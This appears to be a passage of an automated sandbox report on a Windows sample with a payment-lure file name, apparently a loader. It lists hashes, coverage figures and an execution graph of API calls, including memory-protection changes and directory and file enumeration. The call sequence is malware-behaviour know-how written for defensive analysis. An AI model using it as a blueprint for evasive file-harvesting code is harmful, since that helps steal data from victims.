• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
• Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
• Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
• Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8

Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 96.5%
Signature Coverage: 1.8%
Total number of Nodes: 1706
Total number of Limit Nodes: 5
6091 405b6a CharNextW 6089->6091 6090->6072 6091->6089 6102 4064f3 6092->6102 6094 403335 6094->6074 6095 40332b 6095->6094 6111 405b30 lstrlenW CharPrevW 6095->6111 6103 406500 6102->6103 6105 406576 6103->6105 6106 406569 CharNextW 6103->6106 6108 405b5d CharNextW 6103->6108 6109 406555 CharNextW 6103->6109 6110 406564 CharNextW 6103->6110 6104 40657b CharPrevW 6104->6105 6105->6104 6107 40659c 6105->6107 6106->6103 6106->6105 6107->6095 6108->6103 6109->6103 6110->6106 6112 40333d 6111->6112 6113 405b4c lstrcatW 6111->6113 6114 40580f CreateDirectoryW 6112->6114 6113->6112 6115 405823 GetLastError 6114->6115 6116 403343 6114->6116 6115->6116 6117 405d80 6116->6117 6118 405d8d GetTickCount GetTempFileNameW 6117->6118 6119 40334e 6118->6119 6120 405dc3 6118->6120 6119->6074 6120->6118 6120->6119 6121 405d51 GetFileAttributesW CreateFileW 5722 2d41207 5725 2d41242 5722->5725 5723 2d41265 Sleep 5723->5722 5724 2d41273 NtProtectVirtualMemory 5724->5725 5725->5722 5725->5723 5725->5724 6122 34f4a1e0 6125 34f4a1fe 6122->6125 6124 34f4a1f6 6129 34f4a203 6125->6129 6128 34f4a298 6128->6124 6129->6128 6130 34f4aa53 6129->6130 6131 34f4aa70 RtlDecodePointer 6130->6131 6132 34f4aa80 6130->6132 6131->6132 6133 34f4ab0d 6132->6133 6136 34f4ab02 6132->6136 6138 34f4aab7 6132->6138 6133->6136 6137 34f46368 20 API calls 6133->6137 6134 34f42ada 5 API calls 6135 34f4a42f 6134->6135 6135->6124 6136->6134 6137->6136 6138->6136 6139 34f46368 20 API calls 6138->6139 6139->6136 6859 34f481a0 6860 34f481d9 6859->6860 6861 34f481dd 6860->6861 6872 34f48205 6860->6872 6862 34f46368 20 API calls 6861->6862 6863 34f481e2 6862->6863 6865 34f462ac 26 API calls 6863->6865 6864 34f48529 6866 34f42ada 5 API calls 6864->6866 6867 34f481ed 6865->6867 6868 34f48536 6866->6868 6869 34f42ada 5 API calls 6867->6869 6870 34f481f9 6869->6870 6872->6864 6873 34f480c0 6872->6873 6876 34f480db 6873->6876 6874 34f42ada 5 API calls 6875 34f48152 6874->6875 6875->6872 6876->6874 6936 34f47260 GetStartupInfoW 
6937 34f47286 6936->6937 6938 34f47318 6936->6938 6937->6938 6939 34f48be3 27 API calls 6937->6939 6940 34f472af 6939->6940 6940->6938 6941 34f472dd GetFileType 6940->6941 6941->6940 6877 34f421a1 6880 34f42418 6877->6880 6882 34f42420 6880->6882 6884 34f447f5 6882->6884 6883 34f421bc 6885 34f44804 6884->6885 6886 34f44808 6884->6886 6885->6883 6889 34f44815 6886->6889 6890 34f45b7a 20 API calls 6889->6890 6893 34f4482c 6890->6893 6891 34f42ada 5 API calls 6892 34f44811 6891->6892 6892->6883 6893->6891 6894 34f460ac 6895 34f460dd 6894->6895 6897 34f460b7 6894->6897 6896 34f460c7 FreeLibrary 6896->6897 6897->6895 6897->6896 6942 34f4506f 6943 34f45081 6942->6943 6944 34f45087 6942->6944 6945 34f45000 20 API calls 6943->6945 6945->6944 6946 34f4ac6b 6947 34f4ac84 6946->6947 6949 34f4acad 6947->6949 6950 34f4b2f0 6947->6950 6951 34f4b329 6950->6951 6953 34f4b350 6951->6953 6961 34f4b5c1 6951->6961 6954 34f4b393 6953->6954 6955 34f4b36e 6953->6955 6974 34f4b8b2 6954->6974 6965 34f4b8e1 6955->6965 6958 34f4b38e 6959 34f42ada 5 API calls 6958->6959 6960 34f4b3b7 6959->6960 6960->6949 6962 34f4b5ec 6961->6962 6963 34f4b7e5 RaiseException 6962->6963 6964 34f4b7fd 6963->6964 6964->6953 6966 34f4b8f0 6965->6966 6967 34f4b964 6966->6967 6968 34f4b90f 6966->6968 6969 34f4b8b2 20 API calls 6967->6969 6981 34f478a3 6968->6981 6973 34f4b95d 6969->6973 6972 34f4b8b2 20 API calls 6972->6973 6973->6958 6975 34f4b8d4 6974->6975 6976 34f4b8bf 6974->6976 6978 34f46368 20 API calls 6975->6978 6977 34f4b8d9 6976->6977 6979 34f46368 20 API calls 6976->6979 6977->6958 6978->6977 6980 34f4b8cc 6979->6980 6980->6958 6982 34f478cb 6981->6982 6983 34f42ada 5 API calls 6982->6983 6984 34f478e8 6983->6984 6984->6972 6984->6973 6985 34f49e6b 6986 34f49e7d 6985->6986 6987 34f49f71 6985->6987 6986->6987 6988 34f49ee6 6986->6988 6991 34f4b2f0 21 API calls 6987->6991 6992 34f4acad 6987->6992 6989 34f49ef8 6988->6989 6990 34f4aa53 21 API calls 6988->6990 6990->6989 6991->6992 7454 34f4742b 7457 
34f47430 7454->7457 7456 34f47453 7457->7456 7458 34f48bae 7457->7458 7459 34f48bdd 7458->7459 7460 34f48bbb 7458->7460 7459->7457 7461 34f48bd7 7460->7461 7462 34f48bc9 RtlDeleteCriticalSection 7460->7462 7463 34f4571e 20 API calls 7461->7463 7462->7461 7462->7462 7463->7459 6140 34f473d5 6141 34f473e1 6140->6141 6152 34f45671 RtlEnterCriticalSection 6141->6152 6143 34f473e8 6153 34f48be3 6143->6153 6145 34f473f7 6151 34f47406 6145->6151 6166 34f47269 GetStartupInfoW 6145->6166 6150 34f47417 6177 34f47422 6151->6177 6152->6143 6154 34f48bef 6153->6154 6155 34f48c13 6154->6155 6156 34f48bfc 6154->6156 6180 34f45671 RtlEnterCriticalSection 6155->6180 6157 34f46368 20 API calls 6156->6157 6159 34f48c01 6157->6159 6160 34f462ac 26 API calls 6159->6160 6161 34f48c0b 6160->6161 6161->6145 6162 34f48c4b 6188 34f48c72 6162->6188 6163 34f48c1f 6163->6162 6181 34f48b34 6163->6181 6167 34f47286 6166->6167 6168 34f47318 6166->6168 6167->6168 6169 34f48be3 27 API calls 6167->6169 6172 34f4731f 6168->6172 6170 34f472af 6169->6170 6170->6168 6171 34f472dd GetFileType 6170->6171 6171->6170 6173 34f47326 6172->6173 6174 34f47369 GetStdHandle 6173->6174 6175 34f473d1 6173->6175 6176 34f4737c GetFileType 6173->6176 6174->6173 6175->6151 6176->6173 6199 34f456b9 RtlLeaveCriticalSection 6177->6199 6179 34f47429 6179->6150 6180->6163 6182 34f4637b 20 API calls 6181->6182 6183 34f48b46 6182->6183 6187 34f48b53 6183->6187 6191 34f45eb7 6183->6191 6184 34f4571e 20 API calls 6186 34f48ba5 6184->6186 6186->6163 6187->6184 6198 34f456b9 RtlLeaveCriticalSection 6188->6198 6190 34f48c79 6190->6161 6192 34f45c45 5 API calls 6191->6192 6193 34f45ede 6192->6193 6194 34f45efc InitializeCriticalSectionAndSpinCount 6193->6194 6197 34f45ee7 6193->6197 6194->6197 6195 34f42ada 5 API calls 6196 34f45f13 6195->6196 6196->6183 6197->6195 6198->6190 6199->6179 6200 34f44ed7 6211 34f46d60 6200->6211 6205 34f44ef4 6207 34f4571e 20 API calls 6205->6207 6208 34f44f29 6207->6208 6209 34f44eff 6210 34f4571e 20 
API calls 6209->6210 6210->6205 6212 34f46d69 6211->6212 6214 34f44ee9 6211->6214 6244 34f46c5f 6212->6244 6215 34f47153 GetEnvironmentStringsW 6214->6215 6216 34f4716a 6215->6216 6226 34f471bd 6215->6226 6219 34f47170 WideCharToMultiByte 6216->6219 6217 34f471c6 FreeEnvironmentStringsW 6218 34f44eee 6217->6218 6218->6205 6227 34f44f2f 6218->6227 6220 34f4718c 6219->6220 6219->6226 6221 34f456d0 21 API calls 6220->6221 6222 34f47192 6221->6222 6223 34f471af 6222->6223 6224 34f47199 WideCharToMultiByte 6222->6224 6225 34f4571e 20 API calls 6223->6225 6224->6223 6225->6226 6226->6217 6226->6218 6228 34f44f44 6227->6228 6229 34f4637b 20 API calls 6228->6229 6238 34f44f6b 6229->6238 6230 34f44fcf 6231 34f4571e 20 API calls 6230->6231 6232 34f44fe9 6231->6232 6232->6209 6233 34f4637b 20 API calls 6233->6238 6234 34f44fd1 6739 34f45000 6234->6739 6238->6230 6238->6233 6238->6234 6240 34f44ff3 6238->6240 6242 34f4571e 20 API calls 6238->6242 6730 34f4544d 6238->6730 6239 34f4571e 20 API calls 6239->6230 6241 34f462bc 11 API calls 6240->6241 6243 34f44fff 6241->6243 6242->6238 6264 34f45af6 GetLastError 6244->6264 6246 34f46c6c 6284 34f46d7e 6246->6284 6248 34f46c74 6293 34f469f3 6248->6293 6251 34f46c8b 6251->6214 6254 34f46cce 6256 34f4571e 20 API calls 6254->6256 6256->6251 6258 34f46cc9 6259 34f46368 20 API calls 6258->6259 6259->6254 6260 34f46d12 6260->6254 6317 34f468c9 6260->6317 6261 34f46ce6 6261->6260 6262 34f4571e 20 API calls 6261->6262 6262->6260 6265 34f45b0c 6264->6265 6266 34f45b12 6264->6266 6267 34f45e08 11 API calls 6265->6267 6268 34f4637b 20 API calls 6266->6268 6270 34f45b61 SetLastError 6266->6270 6267->6266 6269 34f45b24 6268->6269 6271 34f45b2c 6269->6271 6272 34f45e5e 11 API calls 6269->6272 6270->6246 6273 34f4571e 20 API calls 6271->6273 6274 34f45b41 6272->6274 6275 34f45b32 6273->6275 6274->6271 6276 34f45b48 6274->6276 6278 34f45b6d SetLastError 6275->6278 6277 34f4593c 20 API calls 6276->6277 6279 34f45b53 6277->6279 6320 34f455a8 
6278->6320 6281 34f4571e 20 API calls 6279->6281 6283 34f45b5a 6281->6283 6283->6270 6283->6278 6285 34f46d8a 6284->6285 6286 34f45af6 38 API calls 6285->6286 6291 34f46d94 6286->6291 6288 34f46e18 6288->6248 6290 34f455a8 38 API calls 6290->6291 6291->6288 6291->6290 6292 34f4571e 20 API calls 6291->6292 6469 34f45671 RtlEnterCriticalSection 6291->6469 6470 34f46e0f 6291->6470 6292->6291 6474 34f454a7 6293->6474 6296 34f46a14 GetOEMCP 6298 34f46a3d 6296->6298 6297 34f46a26 6297->6298 6299 34f46a2b GetACP 6297->6299 6298->6251 6300 34f456d0 6298->6300 6299->6298 6301 34f4570e 6300->6301 6305 34f456de 6300->6305 6302 34f46368 20 API calls 6301->6302 6304 34f4570c 6302->6304 6303 34f456f9 RtlAllocateHeap 6303->6304 6303->6305 6304->6254 6307 34f46e20 6304->6307 6305->6301 6305->6303 6306 34f4474f 7 API calls 6305->6306 6306->6305 6308 34f469f3 40 API calls 6307->6308 6309 34f46e3f 6308->6309 6312 34f46e90 IsValidCodePage 6309->6312 6314 34f46e46 6309->6314 6316 34f46eb5 6309->6316 6310 34f42ada 5 API calls 6311 34f46cc1 6310->6311 6311->6258 6311->6261 6313 34f46ea2 GetCPInfo 6312->6313 6312->6314 6313->6314 6313->6316 6314->6310 6621 34f46acb GetCPInfo 6316->6621 6694 34f46886 6317->6694 6319 34f468ed 6319->6254 6331 34f47613 6320->6331 6323 34f455b8 6325 34f455c2 IsProcessorFeaturePresent 6323->6325 6326 34f455e0 6323->6326 6328 34f455cd 6325->6328 6361 34f44bc1 6326->6361 6330 34f460e2 8 API calls 6328->6330 6330->6326 6364 34f47581 6331->6364 6334 34f4766e 6335 34f4767a 6334->6335 6336 34f45b7a 20 API calls 6335->6336 6340 34f476a7 6335->6340 6343 34f476a1 6335->6343 6336->6343 6337 34f476f3 6338 34f46368 20 API calls 6337->6338 6339 34f476f8 6338->6339 6341 34f462ac 26 API calls 6339->6341 6346 34f4771f 6340->6346 6378 34f45671 RtlEnterCriticalSection 6340->6378 6360 34f476d6 6341->6360 6343->6337 6343->6340 6343->6360 6348 34f4777e 6346->6348 6350 34f47776 6346->6350 6357 34f477a9 6346->6357 6379 34f456b9 RtlLeaveCriticalSection 6346->6379 6348->6357 6380 
34f47665 6348->6380 6351 34f44bc1 28 API calls 6350->6351 6351->6348 6354 34f45af6 38 API calls 6358 34f4780c 6354->6358 6356 34f47665 38 API calls 6356->6357 6383 34f4782e 6357->6383 6359 34f45af6 38 API calls 6358->6359 6358->6360 6359->6360 6387 34f4bdc9 6360->6387 6391 34f4499b 6361->6391 6367 34f47527 6364->6367 6366 34f455ad 6366->6323 6366->6334 6368 34f47533 6367->6368 6373 34f45671 RtlEnterCriticalSection 6368->6373 6370 34f47541 6374 34f47575 6370->6374 6372 34f47568 6372->6366 6373->6370 6377 34f456b9 RtlLeaveCriticalSection 6374->6377 6376 34f4757f 6376->6372 6377->6376 6378->6346 6379->6350 6381 34f45af6 38 API calls 6380->6381 6382 34f4766a 6381->6382 6382->6356 6384 34f47834 6383->6384 6385 34f477fd 6383->6385 6390 34f456b9 RtlLeaveCriticalSection 6384->6390 6385->6354 6385->6358 6385->6360 6388 34f42ada 5 API calls 6387->6388 6389 34f4bdd4 6388->6389 6389->6389 6390->6385 6392 34f449a7 6391->6392 6393 34f449bf 6392->6393 6413 34f44af5 GetModuleHandleW 6392->6413 6422 34f45671 RtlEnterCriticalSection 6393->6422 6399 34f449c7 6410 34f44a65 6399->6410 6412 34f44a3c 6399->6412 6423 34f4527a 6399->6423 6401 34f44a82 6433 34f44ab4 6401->6433 6402 34f44aae 6403 34f4bdc9 5 API calls 6402->6403 6408 34f44ab3 6403->6408 6405 34f44669 5 API calls 6405->6410 6409 34f44a54 6409->6405 6430 34f44aa5 6410->6430 6412->6409 6426 34f44669 6412->6426 6414 34f449b3 6413->6414 6414->6393 6415 34f44b39 GetModuleHandleExW 6414->6415 6416 34f44b63 GetProcAddress 6415->6416 6417 34f44b78 6415->6417 6416->6417 6418 34f44b95 6417->6418 6419 34f44b8c FreeLibrary 6417->6419 6420 34f42ada 5 API calls 6418->6420 6419->6418 6421 34f44b9f 6420->6421 6421->6393 6422->6399 6441 34f45132 6423->6441 6427 34f44698 6426->6427 6428 34f42ada 5 API calls 6427->6428 6429 34f446c1 6428->6429 6429->6409 6462 34f456b9 RtlLeaveCriticalSection 6430->6462 6432 34f44a7e 6432->6401 6432->6402 6463 34f46025 6433->6463 6436 34f44ae2 6439 34f44b39 8 API calls 6436->6439 6437 34f44ac2 GetPEB 6437->6436 
6438 34f44ad2 GetCurrentProcess TerminateProcess 6437->6438 6438->6436 6440 34f44aea ExitProcess 6439->6440 6444 34f450e1 6441->6444 6443 34f45156 6443->6412 6445 34f450ed 6444->6445 6452 34f45671 RtlEnterCriticalSection 6445->6452 6447 34f450fb 6453 34f4515a 6447->6453 6451 34f45119 6451->6443 6452->6447 6454 34f4517a 6453->6454 6457 34f45182 6453->6457 6455 34f42ada IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6454->6455 6456 34f45108 6455->6456 6459 34f45126 6456->6459 6457->6454 6458 34f4571e 20 API calls 6457->6458 6458->6454 6460 34f456b9 RtlLeaveCriticalSection 6459->6460 6461 34f45130 6460->6461 6461->6451 6462->6432 6464 34f4604a 6463->6464 6468 34f46040 6463->6468 6465 34f45c45 5 API calls 6464->6465 6465->6468 6466 34f42ada 5 API calls 6467 34f44abe 6466->6467 6467->6436 6467->6437 6468->6466 6469->6291 6473 34f456b9 RtlLeaveCriticalSection 6470->6473 6472 34f46e16 6472->6291 6473->6472 6475 34f454c4 6474->6475 6476 34f454ba 6474->6476 6475->6476 6477 34f45af6 38 API calls 6475->6477 6476->6296 6476->6297 6478 34f454e5 6477->6478 6482 34f47a00 6478->6482 6483 34f47a13 6482->6483 6484 34f454fe 6482->6484 6483->6484 6490 34f47f0f 6483->6490 6486 34f47a2d 6484->6486 6487 34f47a40 6486->6487 6489 34f47a55 6486->6489 6488 34f46d7e 38 API calls 6487->6488 6487->6489 6488->6489 6489->6476 6491 34f47f1b 6490->6491 6492 34f45af6 38 API calls 6491->6492 6493 34f47f24 6492->6493 6501 34f47f72 6493->6501 6502 34f45671 RtlEnterCriticalSection 6493->6502 6495 34f47f42 6503 34f47f86 6495->6503 6500 34f455a8 38 API calls 6500->6501 6501->6484 6502->6495 6504 34f47f94 6503->6504 6506 34f47f56 6503->6506 6504->6506 6510 34f47cc2 6504->6510 6507 34f47f75 6506->6507 6620 34f456b9 RtlLeaveCriticalSection 6507->6620 6509 34f47f69 6509->6500 6509->6501 6511 34f47cd8 6510->6511 6513 34f47d42 6510->6513 6511->6513 6516 34f47d0b 6511->6516 6521 34f4571e 20 API calls 6511->6521 6514 34f4571e 20 API calls 
6513->6514 6537 34f47d90 6513->6537 6515 34f47d64 6514->6515 6518 34f4571e 20 API calls 6515->6518 6517 34f47d2d 6516->6517 6522 34f4571e 20 API calls 6516->6522 6520 34f4571e 20 API calls 6517->6520 6519 34f47d77 6518->6519 6523 34f4571e 20 API calls 6519->6523 6524 34f47d37 6520->6524 6526 34f47d00 6521->6526 6528 34f47d22 6522->6528 6529 34f47d85 6523->6529 6530 34f4571e 20 API calls 6524->6530 6525 34f47dfe 6531 34f4571e 20 API calls 6525->6531 6538 34f490ba 6526->6538 6527 34f47d9e 6527->6525 6535 34f4571e 20 API calls 6527->6535 6566 34f491b8 6528->6566 6534 34f4571e 20 API calls 6529->6534 6530->6513 6536 34f47e04 6531->6536 6534->6537 6535->6527 6536->6506 6578 34f47e35 6537->6578 6539 34f490cb 6538->6539 6565 34f491b4 6538->6565 6540 34f490dc 6539->6540 6541 34f4571e 20 API calls 6539->6541 6542 34f490ee 6540->6542 6544 34f4571e 20 API calls 6540->6544 6541->6540 6543 34f49100 6542->6543 6545 34f4571e 20 API calls 6542->6545 6546 34f49112 6543->6546 6547 34f4571e 20 API calls 6543->6547 6544->6542 6545->6543 6548 34f4571e 20 API calls 6546->6548 6549 34f49124 6546->6549 6547->6546 6548->6549 6550 34f4571e 20 API calls 6549->6550 6554 34f49136 6549->6554 6550->6554 6551 34f4571e 20 API calls 6552 34f49148 6551->6552 6553 34f4915a 6552->6553 6555 34f4571e 20 API calls 6552->6555 6556 34f4916c 6553->6556 6557 34f4571e 20 API calls 6553->6557 6554->6551 6554->6552 6555->6553 6558 34f4917e 6556->6558 6560 34f4571e 20 API calls 6556->6560 6557->6556 6559 34f49190 6558->6559 6561 34f4571e 20 API calls 6558->6561 6562 34f491a2 6559->6562 6563 34f4571e 20 API calls 6559->6563 6560->6558 6561->6559 6564 34f4571e 20 API calls 6562->6564 6562->6565 6563->6562 6564->6565 6565->6516 6567 34f491c5 6566->6567 6577 34f4921d 6566->6577 6568 34f491d5 6567->6568 6569 34f4571e 20 API calls 6567->6569 6570 34f491e7 6568->6570 6571 34f4571e 20 API calls 6568->6571 6569->6568 6572 34f491f9 6570->6572 6573 34f4571e 20 API calls 6570->6573 6571->6570 6574 34f4571e 20 API calls 
6572->6574 6575 34f4920b 6572->6575 6573->6572 6574->6575 6576 34f4571e 20 API calls 6575->6576 6575->6577 6576->6577 6577->6517 6579 34f47e60 6578->6579 6580 34f47e42 6578->6580 6579->6527 6580->6579 6584 34f4925d 6580->6584 6583 34f4571e 20 API calls 6583->6579 6585 34f47e5a 6584->6585 6586 34f4926e 6584->6586 6585->6583 6587 34f49221 20 API calls 6586->6587 6588 34f49276 6587->6588 6589 34f49221 20 API calls 6588->6589 6590 34f49281 6589->6590 6591 34f49221 20 API calls 6590->6591 6592 34f4928c 6591->6592 6593 34f49221 20 API calls 6592->6593 6594 34f49297 6593->6594 6595 34f49221 20 API calls 6594->6595 6596 34f492a5 6595->6596 6597 34f4571e 20 API calls 6596->6597 6598 34f492b0 6597->6598 6599 34f4571e 20 API calls 6598->6599 6600 34f492bb 6599->6600 6601 34f4571e 20 API calls 6600->6601 6602 34f492c6 6601->6602 6603 34f49221 20 API calls 6602->6603 6604 34f492d4 6603->6604 6605 34f49221 20 API calls 6604->6605 6606 34f492e2 6605->6606 6607 34f49221 20 API calls 6606->6607 6608 34f492f3 6607->6608 6609 34f49221 20 API calls 6608->6609 6610 34f49301 6609->6610 6611 34f49221 20 API calls 6610->6611 6612 34f4930f 6611->6612 6613 34f4571e 20 API calls 6612->6613 6614 34f4931a 6613->6614 6615 34f4571e 20 API calls 6614->6615 6616 34f49325 6615->6616 6617 34f4571e 20 API calls 6616->6617 6618 34f49330 6617->6618 6619 34f4571e 20 API calls 6618->6619 6619->6585 6620->6509 6627 34f46b05 6621->6627 6630 34f46baf 6621->6630 6624 34f42ada 5 API calls 6626 34f46c5b 6624->6626 6626->6314 6631 34f486e4 6627->6631 6629 34f48a3e 43 API calls 6629->6630 6630->6624 6632 34f454a7 38 API calls 6631->6632 6633 34f48704 MultiByteToWideChar 6632->6633 6635 34f48742 6633->6635 6636 34f487da 6633->6636 6639 34f456d0 21 API calls 6635->6639 6642 34f48763 6635->6642 6637 34f42ada 5 API calls 6636->6637 6640 34f46b66 6637->6640 6638 34f487d4 6650 34f48801 6638->6650 6639->6642 6645 34f48a3e 6640->6645 6642->6638 6643 34f487a8 MultiByteToWideChar 6642->6643 6643->6638 6644 34f487c4 
GetStringTypeW 6643->6644 6644->6638 6646 34f454a7 38 API calls 6645->6646 6647 34f48a51 6646->6647 6654 34f48821 6647->6654 6651 34f4880d 6650->6651 6652 34f4881e 6650->6652 6651->6652 6653 34f4571e 20 API calls 6651->6653 6652->6636 6653->6652 6655 34f4883c 6654->6655 6656 34f48862 MultiByteToWideChar 6655->6656 6657 34f4888c 6656->6657 6658 34f48a16 6656->6658 6661 34f456d0 21 API calls 6657->6661 6664 34f488ad 6657->6664 6659 34f42ada 5 API calls 6658->6659 6660 34f46b87 6659->6660 6660->6629 6661->6664 6662 34f488f6 MultiByteToWideChar 6663 34f48962 6662->6663 6665 34f4890f 6662->6665 6667 34f48801 20 API calls 6663->6667 6664->6662 6664->6663 6681 34f45f19 6665->6681 6667->6658 6669 34f48971 6673 34f456d0 21 API calls 6669->6673 6676 34f48992 6669->6676 6670 34f48939 6670->6663 6672 34f45f19 11 API calls 6670->6672 6671 34f48a07 6675 34f48801 20 API calls 6671->6675 6672->6663 6673->6676 6674 34f45f19 11 API calls 6677 34f489e6 6674->6677 6675->6663 6676->6671 6676->6674 6677->6671 6678 34f489f5 WideCharToMultiByte 6677->6678 6678->6671 6679 34f48a35 6678->6679 6680 34f48801 20 API calls 6679->6680 6680->6663 6682 34f45c45 5 API calls 6681->6682 6683 34f45f40 6682->6683 6686 34f45f49 6683->6686 6689 34f45fa1 6683->6689 6687 34f42ada 5 API calls 6686->6687 6688 34f45f9b 6687->6688 6688->6663 6688->6669 6688->6670 6690 34f45c45 5 API calls 6689->6690 6691 34f45fc8 6690->6691 6692 34f42ada 5 API calls 6691->6692 6693 34f45f89 LCMapStringW 6692->6693 6693->6686 6695 34f46892 6694->6695 6702 34f45671 RtlEnterCriticalSection 6695->6702 6697 34f4689c 6703 34f468f1 6697->6703 6701 34f468b5 6701->6319 6702->6697 6715 34f47011 6703->6715 6705 34f4693f 6706 34f47011 26 API calls 6705->6706 6707 34f4695b 6706->6707 6708 34f47011 26 API calls 6707->6708 6709 34f46979 6708->6709 6710 34f468a9 6709->6710 6711 34f4571e 20 API calls 6709->6711 6712 34f468bd 6710->6712 6711->6710 6729 34f456b9 RtlLeaveCriticalSection 6712->6729 6714 34f468c7 6714->6701 6716 34f47022 6715->6716 
6724 34f4701e 6715->6724 6717 34f47029 6716->6717 6720 34f4703c 6716->6720 6718 34f46368 20 API calls 6717->6718 6719 34f4702e 6718->6719 6721 34f462ac 26 API calls 6719->6721 6722 34f47073 6720->6722 6723 34f4706a 6720->6723 6720->6724 6721->6724 6722->6724 6726 34f46368 20 API calls 6722->6726 6725 34f46368 20 API calls 6723->6725 6724->6705 6727 34f4706f 6725->6727 6726->6727 6728 34f462ac 26 API calls 6727->6728 6728->6724 6729->6714 6731 34f4545a 6730->6731 6732 34f45468 6730->6732 6731->6732 6735 34f4547f 6731->6735 6733 34f46368 20 API calls 6732->6733 6738 34f45470 6733->6738 6734 34f462ac 26 API calls 6736 34f4547a 6734->6736 6735->6736 6737 34f46368 20 API calls 6735->6737 6736->6238 6737->6738 6738->6734 6740 34f44fd7 6739->6740 6741 34f4500d 6739->6741 6740->6239 6742 34f45024 6741->6742 6743 34f4571e 20 API calls 6741->6743 6744 34f4571e 20 API calls 6742->6744 6743->6741 6744->6740 6898 34f43c90 RtlUnwind 6993 34f45351 6995 34f45360 6993->6995 6998 34f45374 6993->6998 6994 34f4571e 20 API calls 6997 34f45386 6994->6997 6996 34f4571e 20 API calls 6995->6996 6995->6998 6996->6998 6999 34f4571e 20 API calls 6997->6999 6998->6994 7000 34f45399 6999->7000 7001 34f4571e 20 API calls 7000->7001 7002 34f453aa 7001->7002 7003 34f4571e 20 API calls 7002->7003 7004 34f453bb 7003->7004 6745 34f436d3 6746 34f436e2 6745->6746 6748 34f436f0 6745->6748 6747 34f42ada 5 API calls 6746->6747 6747->6748 7464 34f4281c 7465 34f42882 27 API calls 7464->7465 7466 34f4282a 7465->7466 6749 34f44bdd 6750 34f44bec 6749->6750 6751 34f44c08 6749->6751 6750->6751 6752 34f44bf2 6750->6752 6753 34f46d60 51 API calls 6751->6753 6754 34f46368 20 API calls 6752->6754 6755 34f44c0f GetModuleFileNameA 6753->6755 6756 34f44bf7 6754->6756 6758 34f44c33 6755->6758 6757 34f462ac 26 API calls 6756->6757 6760 34f44c01 6757->6760 6772 34f44d01 6758->6772 6762 34f44e76 20 API calls 6763 34f44c5d 6762->6763 6764 34f44c66 6763->6764 6765 34f44c72 6763->6765 6766 34f46368 20 API calls 6764->6766 
6767 34f44d01 38 API calls 6765->6767 6771 34f44c6b 6766->6771 6769 34f44c88 6767->6769 6768 34f4571e 20 API calls 6768->6760 6770 34f4571e 20 API calls 6769->6770 6769->6771 6770->6771 6771->6768 6774 34f44d26 6772->6774 6776 34f44d86 6774->6776 6778 34f470eb 6774->6778 6775 34f44c50 6775->6762 6776->6775 6777 34f470eb 38 API calls 6776->6777 6777->6776 6781 34f47092 6778->6781 6782 34f454a7 38 API calls 6781->6782 6783 34f470a6 6782->6783 6783->6774 6899 34f44a9a 6900 34f45411 38 API calls 6899->6900 6901 34f44aa2 6900->6901 5726 34f41c5b 5727 34f41c6b 5726->5727 5730 34f412ee 5727->5730 5729 34f41c87 5731 34f41324 5730->5731 5732 34f413b7 GetEnvironmentVariableW 5731->5732 5756 34f410f1 5732->5756 5735 34f410f1 57 API calls 5736 34f41465 5735->5736 5737 34f410f1 57 API calls 5736->5737 5738 34f41479 5737->5738 5739 34f410f1 57 API calls 5738->5739 5740 34f4148d 5739->5740 5741 34f410f1 57 API calls 5740->5741 5742 34f414a1 5741->5742 5743 34f410f1 57 API calls 5742->5743 5744 34f414b5 lstrlenW 5743->5744 5745 34f414d2 5744->5745 5746 34f414d9 lstrlenW 5744->5746 5745->5729 5747 34f410f1 57 API calls 5746->5747 5748 34f41501 lstrlenW lstrcatW 5747->5748 5749 34f410f1 57 API calls 5748->5749 5750 34f41539 lstrlenW lstrcatW 5749->5750 5751 34f410f1 57 API calls 5750->5751 5752 34f4156b lstrlenW lstrcatW 5751->5752 5753 34f410f1 57 API calls 5752->5753 5754 34f4159d lstrlenW lstrcatW 5753->5754 5755 34f410f1 57 API calls 5754->5755 5755->5745 5757 34f41118 5756->5757 5758 34f41129 lstrlenW 5757->5758 5769 34f42c40 5758->5769 5761 34f41177 lstrlenW FindFirstFileW 5763 34f411a0 5761->5763 5764 34f411e1 5761->5764 5762 34f41168 lstrlenW 5762->5761 5765 34f411c7 FindNextFileW 5763->5765 5766 34f411aa 5763->5766 5764->5735 5765->5763 5768 34f411da FindClose 5765->5768 5766->5765 5771 34f41000 5766->5771 5768->5764 5770 34f41148 lstrcatW lstrlenW 5769->5770 5770->5761 5770->5762 5772 34f41022 5771->5772 5773 34f410af 5772->5773 5774 34f4102f lstrcatW lstrlenW 5772->5774 
5777 34f410b5 lstrlenW 5773->5777 5778 34f410ad 5773->5778 5775 34f4105a lstrlenW 5774->5775 5776 34f4106b lstrlenW 5774->5776 5775->5776 5788 34f41e89 lstrlenW 5776->5788 5802 34f41e16 5777->5802 5778->5766 5781 34f41088 GetFileAttributesW 5781->5778 5783 34f4109c 5781->5783 5782 34f410ca 5782->5778 5784 34f41e89 5 API calls 5782->5784 5783->5778 5794 34f4173a 5783->5794 5785 34f410df 5784->5785 5807 34f411ea 5785->5807 5789 34f42c40 5788->5789 5790 34f41ea7 lstrcatW lstrlenW 5789->5790 5791 34f41ed1 lstrcatW 5790->5791 5792 34f41ec2 5790->5792 5791->5781 5792->5791 5793 34f41ec7 lstrlenW 5792->5793 5793->5791 5795 34f41747 5794->5795 5822 34f41cca 5795->5822 5798 34f4199f 5798->5778 5801 34f41824 5801->5798 5842 34f415da 5801->5842 5803 34f41e29 5802->5803 5806 34f41e4c 5802->5806 5804 34f41e2d lstrlenW 5803->5804 5803->5806 5805 34f41e3f lstrlenW 5804->5805 5804->5806 5805->5806 5806->5782 5808 34f4120e 5807->5808 5809 34f41e89 5 API calls 5808->5809 5810 34f41220 GetFileAttributesW 5809->5810 5811 34f41235 5810->5811 5812 